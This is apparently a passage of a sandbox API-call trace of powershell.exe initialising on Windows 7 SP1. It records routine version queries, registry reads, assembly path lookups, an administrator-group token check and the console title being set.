	[0941.992] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x2bf2d44, puLen=0x18dab0) returned 1
	[0941.992] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.992] CoTaskMemAlloc (cb=0x44) returned 0x3fd7d0
	[0941.992] lstrcpyW (in: lpString1=0x3fd7d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.992] CoTaskMemFree (pv=0x3fd7d0) 
	[0941.993] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x2bf2da8, puLen=0x18dab0) returned 1
	[0941.993] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0941.993] CoTaskMemAlloc (cb=0x58) returned 0x3b06e0
	[0941.993] lstrcpyW (in: lpString1=0x3b06e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0941.993] CoTaskMemFree (pv=0x3b06e0) 
	[0941.993] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x2bf2e24, puLen=0x18dab0) returned 1
	[0941.993] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.993] CoTaskMemAlloc (cb=0x20) returned 0x3fa8f0
	[0941.993] lstrcpyW (in: lpString1=0x3fa8f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.993] CoTaskMemFree (pv=0x3fa8f0) 
	[0941.993] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x2bf2acc, puLen=0x18dab0) returned 1
	[0941.993] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0941.993] CoTaskMemAlloc (cb=0x66) returned 0x3ef590
	[0941.993] lstrcpyW (in: lpString1=0x3ef590, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0941.993] CoTaskMemFree (pv=0x3ef590) 
	[0941.993] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x0, puLen=0x18dab0) returned 0
	[0941.993] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x0, puLen=0x18dab0) returned 0
	[0941.993] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x0, puLen=0x18dab0) returned 0
	[0941.993] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18da88, puLen=0x18da80 | out: lplpBuffer=0x18da88*=0x2bf2a74, puLen=0x18da80) returned 1
	[0941.993] CoTaskMemAlloc (cb=0x204) returned 0x393db0
	[0941.993] VerLanguageNameW (in: wLang=0x0, szLang=0x393db0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0941.993] CoTaskMemFree (pv=0x393db0) 
	[0941.993] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\", lplpBuffer=0x18dad8, puLen=0x18dad0 | out: lplpBuffer=0x18dad8*=0x2bf2a00, puLen=0x18dad0) returned 1
	[0942.000] CoTaskMemAlloc (cb=0x104) returned 0x400ca0
	[0942.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.000] CoTaskMemFree (pv=0x400ca0) 
	[0942.001] CoTaskMemAlloc (cb=0x104) returned 0x400ca0
	[0942.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.001] CoTaskMemFree (pv=0x400ca0) 
	[0942.005] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d9a8 | out: phkResult=0x18d9a8*=0x2f4) returned 0x0
	[0942.006] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d998 | out: phkResult=0x18d998*=0x2f8) returned 0x0
	[0942.006] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18da28 | out: phkResult=0x18da28*=0x2fc) returned 0x0
	[0942.008] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d96c, lpData=0x0, lpcbData=0x18d968*=0x0 | out: lpType=0x18d96c*=0x1, lpData=0x0, lpcbData=0x18d968*=0x56) returned 0x0
	[0942.008] CoTaskMemAlloc (cb=0x5a) returned 0x3ef520
	[0942.008] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d93c, lpData=0x3ef520, lpcbData=0x18d938*=0x56 | out: lpType=0x18d93c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d938*=0x56) returned 0x0
	[0942.009] CoTaskMemFree (pv=0x3ef520) 
	[0942.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0942.344] CoTaskMemAlloc (cb=0x104) returned 0x400ca0
	[0942.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0942.344] CoTaskMemFree (pv=0x400ca0) 
	[0943.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0943.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0943.771] CoTaskMemAlloc (cb=0x104) returned 0x40bab0
	[0943.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.772] CoTaskMemFree (pv=0x40bab0) 
	[0944.366] CoTaskMemAlloc (cb=0x104) returned 0x40bae0
	[0944.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.367] CoTaskMemFree (pv=0x40bae0) 
	[0944.394] CoTaskMemAlloc (cb=0x104) returned 0x40bae0
	[0944.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.394] CoTaskMemFree (pv=0x40bae0) 
	[0944.395] CoTaskMemAlloc (cb=0x104) returned 0x40bae0
	[0944.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.395] CoTaskMemFree (pv=0x40bae0) 
	[0944.395] CoTaskMemAlloc (cb=0x104) returned 0x40bae0
	[0944.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0944.395] CoTaskMemFree (pv=0x40bae0) 
	[0946.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0946.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0946.557] CoTaskMemAlloc (cb=0x104) returned 0x40bae0
	[0946.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.557] CoTaskMemFree (pv=0x40bae0) 
	[0946.559] CoTaskMemAlloc (cb=0x104) returned 0x40bae0
	[0946.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.559] CoTaskMemFree (pv=0x40bae0) 
	[0947.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0947.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0960.233] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0960.233] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0960.233] CoTaskMemFree (pv=0x40bd00) 
	[0960.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x18d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0960.889] SetErrorMode (uMode=0x1) returned 0x1
	[0960.889] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x18d900 | out: lpFileInformation=0x18d900*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0960.890] SetErrorMode (uMode=0x1) returned 0x1
	[0973.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.980] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0973.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.980] CoTaskMemFree (pv=0x40bd00) 
	[0973.983] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0973.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.983] CoTaskMemFree (pv=0x40bd00) 
	[0973.983] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0973.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.983] CoTaskMemFree (pv=0x40bd00) 
	[0973.985] CoCreateGuid (in: pguid=0x18dcc8 | out: pguid=0x18dcc8*(Data1=0x7e1fbde1, Data2=0x56b1, Data3=0x47e9, Data4=([0]=0x84, [1]=0xed, [2]=0xd4, [3]=0x12, [4]=0xdb, [5]=0xaf, [6]=0x70, [7]=0xae))) returned 0x0
	[0973.988] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0973.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.988] CoTaskMemFree (pv=0x40bd00) 
	[0973.990] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0973.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.990] CoTaskMemFree (pv=0x40bd00) 
	[0973.992] CoTaskMemAlloc (cb=0x104) returned 0x40bd00
	[0973.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40bd00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.992] CoTaskMemFree (pv=0x40bd00) 
	[0974.008] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0974.407] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x18d970 | out: lpConsoleScreenBufferInfo=0x18d970) returned 1
	[0974.441] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0974.651] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x18d970 | out: lpConsoleScreenBufferInfo=0x18d970) returned 1
	[0974.653] GetVersionExW (in: lpVersionInformation=0x18d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0974.655] GetCurrentProcess () returned 0xffffffffffffffff
	[0974.656] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18d998 | out: TokenHandle=0x18d998*=0x310) returned 1
	[0974.660] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18d8b8 | out: TokenInformation=0x0, ReturnLength=0x18d8b8) returned 0
	[0974.661] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x357290
	[0974.661] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x357290, TokenInformationLength=0x4, ReturnLength=0x18d8b8 | out: TokenInformation=0x357290, ReturnLength=0x18d8b8) returned 1
	[0974.662] DuplicateTokenEx (in: hExistingToken=0x310, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18da18 | out: phNewToken=0x18da18*=0x30c) returned 1
	[0974.662] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18d8b8 | out: TokenInformation=0x0, ReturnLength=0x18d8b8) returned 0
	[0974.662] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x3572c0, TokenInformationLength=0x4, ReturnLength=0x18d8b8 | out: TokenInformation=0x3572c0, ReturnLength=0x18d8b8) returned 1
	[0974.662] CheckTokenMembership (in: TokenHandle=0x30c, SidToCheck=0x2ccd780*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18da28 | out: IsMember=0x18da28) returned 1
	[0974.662] CloseHandle (hObject=0x30c) returned 1
	[0974.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.683] CoTaskMemAlloc (cb=0x804) returned 0x1b78f370
	[0974.683] GetConsoleTitleW (in: lpConsoleTitle=0x1b78f370, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0974.799] CoTaskMemFree (pv=0x1b78f370) 
	[0974.826] CoTaskMemAlloc (cb=0x804) returned 0x1b78fc20
	[0974.826] GetConsoleTitleW (in: lpConsoleTitle=0x1b78fc20, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0974.826] CoTaskMemFree (pv=0x1b78fc20) 
	[0974.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.829] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0974.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0974.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
